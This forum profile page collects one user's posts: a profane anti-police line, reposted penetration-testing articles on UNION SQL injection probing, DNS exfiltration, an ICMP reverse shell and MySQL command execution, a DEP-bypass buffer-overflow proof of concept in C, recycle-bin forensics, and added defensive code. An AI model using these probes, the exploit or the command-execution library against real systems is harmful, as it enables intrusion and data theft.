Everything posted by Nytro
-
ACAB. The cops are to blame for this, the scumbags' slaves, the shit-eaters.
-
Play Flappy Bird. Highscore: 1337. Challenge: change the highscore. (It's easy.)
-
[h=1]Insight on UNION query SQL injection[/h]

Last week I wrote about DBMS fingerprint through inband SQL injection (also known as UNION query SQL injection) assuming that a web application parameter is affected by such type of SQL injection threat. Today I will keep the same scenario to focus on the detection of the inband SQL injection vulnerability, which is a prerequirement to exploit it performing the DBMS fingerprint and any other possible attack.

There are mainly two techniques to detect if the vulnerable URL parameter is affected by an inband SQL injection vulnerability:

- UNION ALL SELECT NULL
- ORDER BY

UNION ALL SELECT NULL

The trick here is to perform the HTTP request taking advantage of the SQL syntax standard UNION ALL statement, appending to the vulnerable parameter the UNION ALL SELECT NULL statement N times as long as we do not get any DBMS error messages. Common DBMS error messages when the occurrences of NULL differ from the number of table columns are:

- MySQL: The used SELECT statements have a different number of columns
- PostgreSQL: each UNION query must have the same number of columns
- Microsoft SQL Server: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists
- Oracle: ORA-01789: query block has incorrect number of result columns

In our scenario at the first request (with only one NULL) we will get a DBMS error message (similar to one of the above) or a blank page (if the administrator configured the web server not to return error messages), so we will request http://example/index.php?id=1 UNION ALL SELECT NULL, NULL and we will get a normal page, without any DBMS error message: the remote SELECT query is on a table with two columns and we can append data through the UNION ALL SELECT statement.

ORDER BY

This technique consists in performing the HTTP request taking advantage of the SQL syntax standard ORDER BY statement, appending to the vulnerable parameter the ORDER BY NUM statement and incrementing the number NUM as long as we do not get any DBMS error messages. Common DBMS error messages when the number NUM is greater than the number of table columns are:

- MySQL: Unknown column 'NUM' in 'order clause'
- PostgreSQL: ORDER BY position NUM is not in select list
- Microsoft SQL Server: The ORDER BY position number NUM is out of range of the number of items in the select list
- Oracle: ORA-01785: ORDER BY item must be the number of a SELECT-list expression

In our scenario at the first request (http://example/index.php?id=1 ORDER BY 1) we will not get the normal page (the query output will be sorted alphabetically based on the first table column values), so we will request http://example/index.php?id=1 ORDER BY 2 and we will get again a normal page. Now we already know that the table has two or more columns. Now requesting http://example/index.php?id=1 ORDER BY 3 we will get a DBMS error message (similar to one of the above) or a blank page (if the administrator configured the web server not to return error messages): the remote SELECT query is on a table with two columns and we can append data through the UNION ALL SELECT statement.

EXPLOITING

Both techniques are valid, but probably ORDER BY is more reliable on some custom DBMS/web application settings where, for example, NULL is not allowed as column type: quite a rare case, but it can happen. Once we know how many columns there are in the table we have to check if the inband SQL injection is effectively visible (exploitable). In our scenario we can request http://example/index.php?id=1 UNION ALL SELECT NULL, '1234' and if the string 1234 appears in the HTML source code of the HTTP response page, we have an exploitable SQL injection. Remember to correctly encode with a DBMS CHAR() or similar function the strings to evade magic_quotes_gpc and some other security settings. I will illustrate some possible security settings evasion techniques in a future post.

Now that we have an exploitable inband SQL injection we are ready to take advantage of this threat in our penetration test, for example performing a remote DBMS fingerprint [1] [2], usually the second step when exploiting this web applications vulnerability.

NOTES

- The ALL is strongly advised to evade DISTINCT if present in the original web application SELECT query.
- The columns entries data type must fit: usually NULL fits all DBMS data types. The point here is to find a string (depending on the remote DBMS: varchar, bpchar, etc.) where to inject our query. In our scenario, the remote DBMS being MySQL, it will work also in the first column even if it is an integer (int) because MySQL is not too restrictive in data types matching.
- In case the web application SELECT statement is similar to "SELECT id, name FROM testtable WHERE id=" . $_GET['id'] . " LIMIT 0, 1" we can evade the SQL syntax LIMIT by commenting out the end of the query after our injected one, for instance requesting http://example/index.php?id=1 UNION ALL SELECT NULL, NULL-- where '--' starts a valid SQL comment in MySQL, Microsoft SQL Server and other DBMSs.

Implementation on sqlmap code: inband SQL injection library

Posted 11th July 2007 by Bernardo Damele

Source: Bernardo Damele A. G.: Insight on UNION query SQL injection
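The concatenated SELECT quoted in the NOTES above, "SELECT id, name FROM testtable WHERE id=" . $_GET['id'] . " LIMIT 0, 1", is the whole reason the ORDER BY and UNION ALL SELECT NULL probes work: the parameter is parsed as SQL and the DBMS error text is handed back to the client. The following is an added example, not code from the post or from sqlmap; it rebuilds that query in Python on an in-memory SQLite database next to its parameterised form, so the outcome of each probe under both forms can be compared. The table `testtable` and its rows are constructed test data, and `demo()` is a helper introduced here.

```python
"""Added example (not from the post): the post's concatenated SELECT rebuilt on SQLite
beside a parameterised query, run against the probes the post describes.
The table contents are constructed test data."""
import sqlite3


def make_db():
    # Constructed two-column table, matching the post's scenario.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE testtable (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO testtable VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def vulnerable_lookup(conn, user_input):
    """String concatenation: whatever follows 'id=' is parsed as SQL, and the DBMS
    error text (the signal the probes rely on) is returned to the caller."""
    sql = "SELECT id, name FROM testtable WHERE id=" + user_input + " LIMIT 0, 1"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "DBMS error: " + str(exc)


def safe_lookup(conn, user_input):
    """Parameterised form: the input is bound as one value compared against id;
    the query text never changes, so no column-count probe can produce an error."""
    sql = "SELECT id, name FROM testtable WHERE id=? LIMIT 0, 1"
    return conn.execute(sql, (user_input,)).fetchall()


def demo():
    """Run the post's probes against both forms; returns {probe: (vulnerable, safe)}."""
    conn = make_db()
    probes = [
        "1",
        "1 ORDER BY 2",                        # in range: the normal page
        "1 ORDER BY 3",                        # out of range: error leaks the column count
        "1 UNION ALL SELECT NULL, '1234'",     # appended row is swallowed by LIMIT 0, 1
        "1 UNION ALL SELECT NULL, '1234'-- ",  # comment disables the LIMIT, row appears
    ]
    return {p: (vulnerable_lookup(conn, p), safe_lookup(conn, p)) for p in probes}


if __name__ == "__main__":
    for probe, (vuln, safe) in demo().items():
        print(f"{probe!r:45} vulnerable={vuln!r} safe={safe!r}")
```

Under the parameterised form every probe simply fails to match an id and returns an empty result, with no error and no extra row; the same hardening applies to the PHP in the post via prepared statements. Suppressing error pages, as the post notes, only hides the signal, it does not remove the injection.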
-
Data Retrieval over DNS in SQL Injection Attacks

Miroslav Štampar, AVL-AST d.o.o., Zagreb, Croatia, miroslav.stampar@avl.com

Abstract

This paper describes an advanced SQL injection technique where the DNS resolution process is exploited for retrieval of malicious SQL query results. Resulting DNS requests are intercepted by the attackers themselves at the controlled remote name server, extracting valuable data. The open source SQL injection tool sqlmap [1] has been adjusted to automate this task. With the modifications done, attackers are able to use this technique for fast and low-profile data retrieval, especially in cases where other standard ones fail.

Introduction

Exfiltration is a military term for removal of assets from within enemy territory by covert means. It now has an excellent modern usage in computing, meaning the illicit extraction of data from a system. The most covert data extraction method is considered to be Domain Name Server (DNS) exfiltration [2]. This method can even be used on systems without a public network connection by resolving domain name queries outside the perimeter of trusted hosts through a series of internal and external name servers.

DNS is a relatively simple protocol. Both the query made by a DNS client and the corresponding response provided by a DNS server use the same basic DNS message format. With the exception of zone transfers, which use TCP for the sake of reliability, DNS messages are encapsulated within a UDP datagram. To someone monitoring a machine with a tool like Wireshark [3], a covert channel implemented over DNS would look like a series of little blips that flash in and out of existence [4]. The act of relaying DNS queries from secure systems to arbitrary internet-based name servers forms the basis of this uncontrolled data channel. Even if we assume that connections to public networks are not allowed, if the target host is able to resolve arbitrary domain names, data exfiltration is possible via forwarded DNS queries [5].

When other, faster SQL injection (SQLi) data retrieval techniques fail, data is usually retrieved in a bit-by-bit manner, which is a very noisy and time consuming process. Thus, attackers will typically need tens of thousands of requests to retrieve the content of a regular sized table. What is going to be described is the technique where attackers can retrieve results for malicious SQL queries (e.g. administrator password) by provoking specially crafted DNS requests from the vulnerable Database Management System (DBMS) and intercepting those at the other end, transferring dozens of resulting characters per single iteration.

Download: http://arxiv.org/pdf/1303.3047.pdf
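The channel the paper describes leaves a characteristic trace on the resolver side: many distinct, long, high-entropy labels queried under a single domain, which is what a defender can look for. The following heuristic is an added example, not part of the paper or of sqlmap; it runs over resolver query logs in a constructed format (`<time> <client> <queried name>`) with constructed lines, and `attacker-controlled.test` is a placeholder domain. The registered domain is taken as the last two labels, which is a simplification noted in the code.

```python
"""Added example (not from the paper): flag domains whose subdomain traffic looks like
an outbound DNS data channel. Log format and lines are constructed."""
import math
from collections import Counter, defaultdict

# Constructed resolver log: "<time> <client> <queried name>".
SAMPLE_LOG = """\
12:00:01 10.0.0.5 www.example.com
12:00:02 10.0.0.5 mail.example.com
12:00:03 10.0.0.9 kq7v2m9xaz3rtbn4.c0.attacker-controlled.test
12:00:03 10.0.0.9 p8wu5hjd6ygf1eo2.c1.attacker-controlled.test
12:00:04 10.0.0.9 zl4ta9r3qxmvn7k8.c2.attacker-controlled.test
12:00:05 10.0.0.9 b6ey0dsu2whp5gj1.c3.attacker-controlled.test
12:00:06 10.0.0.5 cdn.example.com
"""


def shannon_entropy(text):
    """Bits per character; encoded data chunks score far above dictionary labels."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            records.append((parts[0], parts[1], parts[2].rstrip(".").lower()))
    return records


def registered_domain(qname):
    # Last two labels; a production check would consult the public suffix list
    # so that names like example.co.uk are grouped correctly.
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def domain_stats(records):
    """Per registered domain: distinct names seen, average prefix length and entropy."""
    names_by_domain = defaultdict(set)
    for _, _, qname in records:
        names_by_domain[registered_domain(qname)].add(qname)
    stats = {}
    for domain, names in names_by_domain.items():
        prefixes = [n[: -(len(domain) + 1)] for n in names if n != domain]
        if not prefixes:
            continue
        stats[domain] = {
            "unique_names": len(names),
            "avg_prefix_len": sum(len(p) for p in prefixes) / len(prefixes),
            "avg_entropy": sum(shannon_entropy(p.replace(".", "")) for p in prefixes) / len(prefixes),
        }
    return stats


def flag_exfiltration(records, min_unique=3, min_len=12, min_entropy=3.0):
    """Domains whose subdomain traffic looks like an outbound data channel."""
    return {
        d: s for d, s in domain_stats(records).items()
        if s["unique_names"] >= min_unique
        and s["avg_prefix_len"] >= min_len
        and s["avg_entropy"] >= min_entropy
    }


if __name__ == "__main__":
    for domain, s in flag_exfiltration(parse_log(SAMPLE_LOG)).items():
        print(domain, s)
```

Thresholds need tuning per environment: content delivery networks, anti-virus reputation lookups and some mail filters legitimately generate long hashed labels, so an allowlist of known services belongs in front of this check, and the per-client view (one internal host, one domain, a burst of unique names) is usually the stronger signal than the per-domain totals alone.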
-
[h=1]Reverse connection: ICMP shell[/h]

Background

Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services (ingress filtering) and setting strong egress access control lists is one of these cases. In such scenarios, when you have owned a machine that is part of the internal network or the DMZ (e.g. in a Citrix breakout engagement or similar), it is not always trivial to get a reverse shell over TCP, not to consider a bind shell. However, what about UDP (commonly a DNS tunnel) or ICMP as the channel to get a reverse shell? ICMP is the focus of this post.

Surfing the Net I found two handy tools to get a reverse shell over ICMP:

- soicmp - Developed in Python. Some useful features like the possibility to run the soicmp daemon on multiple ethernet interfaces simultaneously, handling multiple client connections. Unfortunately it uses RAW_SOCKETS on both client and server. You'll need the highest system privileges (root / administrator) to successfully run it on both endpoints. This means that you need root privileges on the target system that you have owned, which might not always be the case. It is cross-platform. Also, it looks to me that it is unmaintained as of 2006-10-26.
- icmpshell - Developed in C. As per soicmp, it uses raw sockets on both the client and server side, therefore root privileges are required to use this program. It works on POSIX systems only, no support for Windows. Also, it looks to me that it is unmaintained as of 2002-02-06.

icmpsh

Last year a friend of mine coded a tool called icmpsh. It implements the reverse ICMP shell concept very well. The main advantage over the other open source tools is that it does not require administrative privileges to run on the target machine. I spent some time playing with the tool and was immediately impressed. It is clean, easy and portable. The slave (client) runs on the target machine; it is written in C and works on Windows only, whereas the master (server) can run on any platform as it has been implemented in C and Perl by Nico. I ported it to Python too. The reason for the Python port is that I wrapped it into sqlmap too. As of version 0.9 stable you can either establish the out-of-band connection via TCP with Metasploit or via ICMP with icmpsh (switch --os-pwn).

Features

- Open source software - primarily coded by Nico, forked by me.
- Client/server architecture.
- The master is portable across any platform that can run either C, Perl or Python code.
- The target system has to be Windows because the slave runs on that platform only for now.
- The user running the slave on the target system does not require administrative privileges.

Example

Running icmpsh slave on target system (192.168.136.129) by specifying the master IP 192.168.136.1

Running icmpsh master on attacker machine (192.168.136.1) and issuing two OS commands onto the target system (192.168.136.129)

Response packet from icmpsh slave containing output of issued command whoami

The forked tool can be found on my GitHub at https://github.com/inquisb/icmpsh. Feedback is always welcome!

Posted 15th April 2011 by Bernardo Damele

Source: Bernardo Damele A. G.: Reverse connection: ICMP shell
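A reverse ICMP shell only works because echo traffic is usually allowed through and rarely inspected; the third screenshot in the post (an echo reply carrying the output of whoami) is exactly what a defender can check for. The code below is an added example, not from the post or the icmpsh project: a payload classifier that separates the payloads ordinary ping tools emit (Windows fills its data with the letters a..w repeated; Linux iputils writes a timestamp followed by bytes that count upward) from echo packets carrying anything else, run here over constructed packet records. The classification thresholds and the record format `(src, dst, icmp_type, payload)` are choices made for this example.

```python
"""Added example (not from the post or icmpsh): classify ICMP echo payloads as
ordinary ping data or as something else worth a look. Sample records are constructed."""
import string
from collections import Counter

# Windows ping data is the alphabet a..w repeated (32 bytes by default).
WINDOWS_PATTERN = b"abcdefghijklmnopqrstuvw"
PRINTABLE = set(string.printable.encode())


def is_windows_ping_payload(payload):
    if not payload:
        return False
    repeats = len(payload) // len(WINDOWS_PATTERN) + 1
    return payload == (WINDOWS_PATTERN * repeats)[: len(payload)]


def is_linux_ping_payload(payload):
    """Linux ping: 8- or 16-byte timestamp, then bytes equal to their own offset."""
    for ts_len in (8, 16):
        tail = payload[ts_len:]
        if len(payload) > ts_len and all(b == (ts_len + i) & 0xFF for i, b in enumerate(tail)):
            return True
    return False


def classify_payload(payload):
    """None for a payload that looks like a normal ping, otherwise a reason string."""
    if is_windows_ping_payload(payload) or is_linux_ping_payload(payload):
        return None
    if not payload:
        return "empty-payload"
    printable_ratio = sum(1 for b in payload if b in PRINTABLE) / len(payload)
    if printable_ratio >= 0.9 and (b"\n" in payload or b">" in payload):
        return "printable-text"   # command output or a shell prompt in an echo packet
    return "unknown-pattern"


def scan(records):
    """records: iterable of (src, dst, icmp_type, payload). Returns the flagged
    packets and, per source address, how many echo packets did not look like ping."""
    flagged, per_source = [], Counter()
    for src, dst, icmp_type, payload in records:
        if icmp_type not in (0, 8):   # echo reply / echo request only
            continue
        reason = classify_payload(payload)
        if reason:
            flagged.append((src, dst, icmp_type, reason))
            per_source[src] += 1
    return flagged, per_source


# Constructed sample traffic (addresses taken from the post's example).
SAMPLE = [
    ("192.168.136.1", "192.168.136.129", 8, b"abcdefghijklmnopqrstuvwabcdefghi"),
    ("192.168.136.129", "192.168.136.1", 0, b"\x00" * 8 + bytes(range(0x08, 0x38))),
    ("192.168.136.129", "192.168.136.1", 0, b"target\\user\r\n"),
    ("192.168.136.129", "192.168.136.1", 0, b"C:\\Windows\\system32>"),
    ("192.168.136.129", "192.168.136.1", 0, b"\x8f\x02\xaa\x31\xc4"),
    ("192.168.136.5", "192.168.136.1", 3, b"\x45\x00\x00\x54"),   # unreachable, skipped
]

if __name__ == "__main__":
    flagged, per_source = scan(SAMPLE)
    for entry in flagged:
        print(entry)
    print(dict(per_source))
```

A single odd payload is weak evidence; a host that keeps emitting echo replies with printable text to one peer, with no matching request/reply sizes, is the pattern to alert on, and the same check applies to the request direction, where the commands travel.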
-
DEP bypass with SetProcessDEPPolicy()

Data Execution Prevention (DEP) was introduced in Windows XP SP2 and is included in Windows XP Tablet PC Edition 2005, Windows Server 2003 Service Pack 1 and later, Windows Vista Service Pack 0 and later, Windows Server 2008 Service Pack 0 and later, and all newer versions of Windows. Hardware-enforced DEP, for CPUs that support NX (AMD) or XD (Intel) bits, enforces non-executable pages: basically it marks the stack/part of the stack as non-executable, thus preventing the execution of arbitrary shellcode residing on the stack. When the processor/system has NX/XD support enabled, then Windows DEP is hardware DEP. Compilers such as Visual Studio C++ offer a link flag (/NXCOMPAT) that will enable applications for DEP protection. It's enabled by default since it was introduced in Visual Studio 2005.

DEP can be circumvented in a number of ways by an attacker while exploiting a buffer overflow vulnerability to successfully achieve arbitrary command execution or, generally speaking, "successful shellcode run" when it resides on the stack. Some of these techniques are:

- Return-to-libc with a call to WinExec(), widely covered in many papers and slides.
- ZwProtectVirtualMemory, researched and explained on John's blog.
- NtSetInformationProcess, initially researched by skape and Skywing and explained in an Uninformed article titled Bypassing Windows Hardware-enforced Data Execution Prevention. This is the widely known and used technique in most publicly available exploits that bypass hardware-enforced DEP.
- SetProcessDEPPolicy, discussed in this blog post.

The SetProcessDEPPolicy() API has been "silently" added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008. Michael Howard wrote a post on his blog back in early 2009 on how to use this function to set DEP for the current process from a developer perspective; I found it fairly well documented on MSDN too. It has also been mentioned back in summer 2008 by Alexander Sotirov and Mark Dowd in their Black Hat USA presentation titled Bypassing Browser Memory Protections. Apart from these references, I did not find on the Internet any proof of concept demonstrating in practice how to abuse this API while exploiting a buffer overflow vulnerability to bypass hardware-enforced DEP, so I wrote the following proof of concept and hope it might be of help to other people too. In my opinion this technique is the simplest among the ones I have mentioned: it does not require any stack or register alignment to be in place before the function is called. The only drawback is that it is not supported on Windows 2003.

My test environment is a Windows XP Professional SP3 English updated on December 9, 2009 with DEP manually set to OptOut, so enabled for all processes except the ones that are put in the exception list, and the following proof of concept is not.

DEP manually set to OptOut on Windows XP with no exceptions

The source code has been compiled with Microsoft Visual C++ 2008 Express Edition in Release mode with the default flags. This includes the /NXCOMPAT and /GS flags. Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed in this specific case because the string buffer that we are going to overflow, buf, is 4 bytes long, so the compiler does not add the stack cookie to the useSetProcessDEPPolicy() function for performance reasons. Remember that the strict_gs_check pragma by default is turned off.

The following screenshot of Immunity Debugger shows that the shellcode (INT 3 instruction only in this PoC) has been successfully executed after DEP has been disabled abusing SetProcessDEPPolicy(). If DEP was not disabled, an Access Memory Violation would have been raised and the process would have been terminated.

Follows the proof of concept:

/*
 * This is a proof of concept of buffer overflow exploitation with DEP bypass
 * on Windows XP Professional SP3 english updated on December 9, 2009 with DEP
 * manually set to OptOut so enabled for all processes, except the ones that
 * are put in the exception list and this program is not.
 *
 * This source has been compiled with Microsoft Visual C++ 2008 Express Edition
 * in Release mode with the default flags. This includes /NXCOMPAT and /GS.
 * Buffer Security Check (stack cookie, /GS flag) does not need to be bypassed
 * because the string buffer, buf, in this example is 4 bytes long, so the
 * compiler does not add the GS cookie to the useSetProcessDEPPolicy()
 * function. Remember that strict_gs_check pragma by default is turned off.
 *
 * References:
 * * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows Server 2008'
 *   by Michael Howard,
 *   http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
 * * SetProcessDEPPolicy Function,
 *   http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx
 *
 * Feel free to write me for comments and questions,
 * Bernardo Damele A. G. <bernardo.damele@gmail.com>
 */

#include <windows.h>
#include <stdlib.h>
#include <string.h>   /* strcpy() and memcpy() */

void useSetProcessDEPPolicy()
{
    char buf[4];

    /* Overflow the string buffer and EBP register. */
    strcpy(buf, "AAAABBBB");

    /*
     * SetProcessDEPPolicy() API has been added to Windows Vista SP1,
     * Windows XP SP3 and Windows Server 2008 and can be abused by an
     * attacker while exploiting a buffer overflow vulnerability to
     * disable hardware-enforced DEP (NX/XD bit) for the running process.
     *
     * Overwrite EIP with the address of SetProcessDepPolicy() API, which
     * is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
     * December 9, 2009.
     *
     * NOTE: You might need to adapt it depending on your system patch level.
     */
    memcpy(buf+8, "\xa4\x22\x86\x7c", 4);

    /*
     * Return address of SetProcessDepPolicy().
     * Use an address of a JMP ESP instruction in kernel32.dll to jump to
     * our shellcode on the top of the stack.
     *
     * NOTE: You might need to adapt it depending on your system patch level.
     */
    memcpy(buf+12, "\x13\x44\x87\x7c", 4);

    /*
     * Argument for SetProcessDepPolicy().
     * 0x00000000 turns off DEP for this process.
     */
    memcpy(buf+16, "\x00\x00\x00\x00", 4);

    /*
     * The shellcode to be executed after DEP has been disabled.
     * For instance, a breakpoint (INT 3 instruction) to call the debug
     * exception handler which will pause the process.
     */
    memcpy(buf+20, "\xcc", 1);
}

int main()
{
    useSetProcessDEPPolicy();

    return 0;
}

This source code can also be found here.

Posted 9th December 2009 by Bernardo Damele

Source: Bernardo Damele A. G.: DEP bypass with SetProcessDEPPolicy()
-
[h=1]Command execution with a MySQL UDF[/h]

Modern database management systems are powerful applications: they provide several instruments to interact with the underlying operating system. On MySQL it is possible to create a User-Defined Function to execute commands on the underlying operating system. Marco Ivaldi demonstrated that some years ago. His raptor_udf2.c works well, but it has two limitations:

- It is not MySQL 5.0+ compliant because it does not follow the new guidelines to create a proper UDF.
- It calls the C function system() to execute the command and always returns integer 0.

These limitations make the UDF almost useless on recent MySQL server installations if the database administrator wants to get the exit status of the command as UDF output or the command standard output itself.

I recently came across an open repository of MySQL User-Defined Functions maintained by Roland Bouman and other developers. One of their codes kept my attention: lib_mysqludf_sys (version 0.0.2), which implements three different functions to interact with the underlying environment:

- sys_exec: executes an arbitrary command, and can thus be used to launch an external application.
- sys_get: gets the value of an environment variable.
- sys_set: creates an environment variable, or updates the value of an existing environment variable.

The first function can be used to execute operating system commands and has two advantages over raptor's UDF:

- It is MySQL 5.0+ compliant and it compiles on both Linux as a shared object and on Windows as a dynamic-link library.
- It returns the exit status of the executed command.

However, neither of these two functions returns the command standard output, so I took some time to patch this last source code adding a sys_eval() UDF to return the standard output of the command if it succeeds, NULL otherwise. The patched source code can be found on the sqlmap subversion repository here and a single patch file for the original lib_mysqludf_sys version 0.0.2 is available here.

Usage example:

$ wget --no-check-certificate https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz
$ tar xfz lib_mysqludf_sys_0.0.3.tar.gz
$ cd lib_mysqludf_sys_0.0.3
$ sudo ./install.sh
Compiling the MySQL UDF
gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o /usr/lib/lib_mysqludf_sys.so
MySQL UDF compiled successfully

Please provide your MySQL root password
Enter password:
MySQL UDF installed successfully
$ mysql -u root -p mysql
Enter password:
[...]
mysql> SELECT sys_eval('id');
+--------------------------------------------------+
| sys_eval('id')                                   |
+--------------------------------------------------+
| uid=118(mysql) gid=128(mysql) groups=128(mysql)  |
+--------------------------------------------------+
1 row in set (0.02 sec)

mysql> SELECT sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
|                                 0 |
+-----------------------------------+
1 row in set (0.02 sec)

mysql> exit
Bye
$ ls -l /tmp/test_mysql
-rw-rw---- 1 mysql mysql 0 2009-01-16 23:18 /tmp/test_mysql

UPDATE on January 25, 2009: Roland Bouman uploaded to the MySQL User-Defined Functions repository my patched version of lib_mysqludf_sys. He also updated its manual page. You can now get version 0.0.3 also from his repository. PacketStormSecurity.org and milw0rm.com mirrored it here and here.

Posted 16th January 2009 by Bernardo Damele

Source: Bernardo Damele A. G.: Command execution with a MySQL UDF
-
Recycle Bin Forensics

An icon on the Windows desktop represents a directory in which deleted files are temporarily stored. This enables you to retrieve files that you may have accidentally deleted. From time to time, you’ll want to purge the recycle bin to free up space on your hard disk. You can also configure Windows so that it doesn’t use the recycle bin at all, but then you won’t be able to retrieve accidentally deleted files.

When a file is deleted in the Microsoft Windows operating system, it doesn’t delete it permanently; it is stored in the recycle bin. If a user wants to restore the deleted file from the recycle bin, it can be done. If the user holds the shift key at the time of deleting a file, then the file will be deleted permanently without being stored in the recycle bin. In this case, the file is moved to a hidden, system folder where it is renamed and stored until further instructions are given as to what is to happen to the file.

From the forensic point of view, the recycle bin is a gold mine for gathering evidence, clues, etc. By analyzing the recycle bin, we can recover useful data. To understand how the information files are structured and how the naming convention works, there must first be an understanding of how the recycle bin works. When a user “deletes” a file in Windows, the file itself is not actually deleted. The file at this point is copied into the recycle bin’s system folder, where it is held until the user gives further instructions on what to do with the file. This location varies, depending on the version of Windows the user is running. The table below shows locations from both past versions of Windows as well as Windows Vista.

Here we will see how to analyze the INFO2 file for the Windows XP operating system. First check out the Recycler folder on the C drive. The Recycler folder is a hidden directory, so we have to make some changes in the folder options to view that directory. Open “Folder Options,” then select “Show hidden files and folders” under the “Hidden files and folders” section. Uncheck “Hide protected operating system files” and you are done. Once the changes have been made, browse the C drive and you can see the Recycler folder clearly.

Inside the Recycler folder, there’ll be another folder with a name like “S-1-5-21-1078081533-1957994488-1343024091-1003” or similar. This will be generated for every separate user. In our case, we have only one user in this system; that’s why we have only one. Now navigate to this directory via the command prompt and type dir /a to view all files and folders. In the figure below we can see there is an INFO2 file. Just extract that file to a different location.

We can’t normally open that file, so we will use a tool called Rifiuti. Rifiuti is a recycle bin forensic analysis tool. Rifiuti, the Italian word meaning “trash,” was developed to examine the contents of the INFO2 file in the recycle bin. Next put the INFO2 file inside the Rifiuti folder and run rifiuti.exe via the command prompt. We can see the Rifiuti usage command after running rifiuti.exe. Now type in:

rifiuti.exe INFO2 >result.txt

After running the command, the program will create a result.txt file in the rifiuti folder. Open the result.txt file. Now we can clearly see the details of every file: the deletion time of the file, from which drive it was deleted, the drive number and the file size.

References:

- McAfee (Antivirus, Encryption, Firewall, Email Security, Web Security, Risk & Compliance): downloads/free-tools/rifiuti.aspx
- What is INFO2 File Hidden in Recycled or Recycler Folder? • Raymond.CC

By Rohit Shaw | February 12th, 2014

Source: Recycle Bin Forensics - InfoSec Institute
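The fields Rifiuti prints from INFO2 (deletion time, source drive, original path, file size) sit at fixed offsets in the file, so they can also be recovered without the tool, which is useful when verifying a tool's output or when working on a platform it does not run on. The parser below is an added example, not code from the article or from Rifiuti; it follows the documented Windows XP INFO2 layout (a 20-byte header holding the version and record size, then 800-byte records: 260-byte ANSI path, record index, drive number, FILETIME, size, 520-byte Unicode path) and also reconstructs the `Dc1.ext` name the file receives inside RECYCLER. The INFO2 image it parses is constructed by `build_sample_info2()` here, not taken from a real system.

```python
"""Added example (not from the article or Rifiuti): parse Windows XP INFO2 records.
Offsets follow the documented INFO2 format; the sample image is constructed below."""
import struct
from datetime import datetime, timedelta, timezone

HEADER_SIZE = 0x14          # version, 2 reserved dwords, record size, total size of files
XP_RECORD_SIZE = 800        # 260 ANSI path + 4 index + 4 drive + 8 FILETIME + 4 size + 520 Unicode path
INDEX_OFF, DRIVE_OFF, FILETIME_OFF, SIZE_OFF, UNICODE_OFF = 0x104, 0x108, 0x10C, 0x114, 0x118
EPOCH_AS_FILETIME = 116444736000000000   # 1970-01-01 UTC in 100 ns ticks since 1601-01-01
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> timezone-aware datetime."""
    return UNIX_EPOCH + timedelta(microseconds=(filetime - EPOCH_AS_FILETIME) // 10)


def datetime_to_filetime(dt):
    delta = dt - UNIX_EPOCH
    return EPOCH_AS_FILETIME + (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_info2(data):
    """Return (version, records); each record is a dict of the recovered fields."""
    version, _, _, record_size, _ = struct.unpack_from("<IIIII", data, 0)
    records, offset = [], HEADER_SIZE
    while offset + record_size <= len(data):
        rec = data[offset:offset + record_size]
        offset += record_size
        ansi_path = rec[:260].split(b"\x00", 1)[0].decode("latin-1")
        index, drive = struct.unpack_from("<II", rec, INDEX_OFF)
        (filetime,) = struct.unpack_from("<Q", rec, FILETIME_OFF)
        (size,) = struct.unpack_from("<I", rec, SIZE_OFF)
        unicode_path = rec[UNICODE_OFF:UNICODE_OFF + 520].decode("utf-16-le").split("\x00", 1)[0]
        path = unicode_path or ansi_path
        basename = path.rsplit("\\", 1)[-1]
        ext = basename[basename.rfind("."):] if "." in basename else ""
        drive_letter = chr(ord("A") + drive)       # 0 = A:, 2 = C:
        records.append({
            "index": index,
            "original_path": path,
            "recycled_name": f"D{drive_letter.lower()}{index}{ext}",   # name inside RECYCLER
            "drive": drive_letter,
            "deleted_at": filetime_to_datetime(filetime),
            "size": size,
        })
    return version, records


def build_record(path, index, drive, deleted_at, size):
    """Constructed record in the XP layout, used only to produce sample input."""
    rec = bytearray(XP_RECORD_SIZE)
    ansi = path.encode("latin-1")[:259]
    rec[:len(ansi)] = ansi
    struct.pack_into("<II", rec, INDEX_OFF, index, drive)
    struct.pack_into("<Q", rec, FILETIME_OFF, datetime_to_filetime(deleted_at))
    struct.pack_into("<I", rec, SIZE_OFF, size)
    uni = path.encode("utf-16-le")[:518]
    rec[UNICODE_OFF:UNICODE_OFF + len(uni)] = uni
    return bytes(rec)


def build_sample_info2():
    """Two constructed deletions: one from C: (drive 2), one from D: (drive 3)."""
    recs = [
        build_record("C:\\Documents and Settings\\user\\Desktop\\notes.txt", 1, 2,
                     datetime(2014, 2, 12, 10, 30, 15, tzinfo=timezone.utc), 2048),
        build_record("D:\\photos\\img_0001.jpg", 2, 3,
                     datetime(2014, 2, 12, 11, 5, 0, tzinfo=timezone.utc), 1_048_576),
    ]
    header = struct.pack("<IIIII", 5, 0, 0, XP_RECORD_SIZE, 2048 + 1_048_576)
    return header + b"".join(recs)


if __name__ == "__main__":
    version, records = parse_info2(build_sample_info2())
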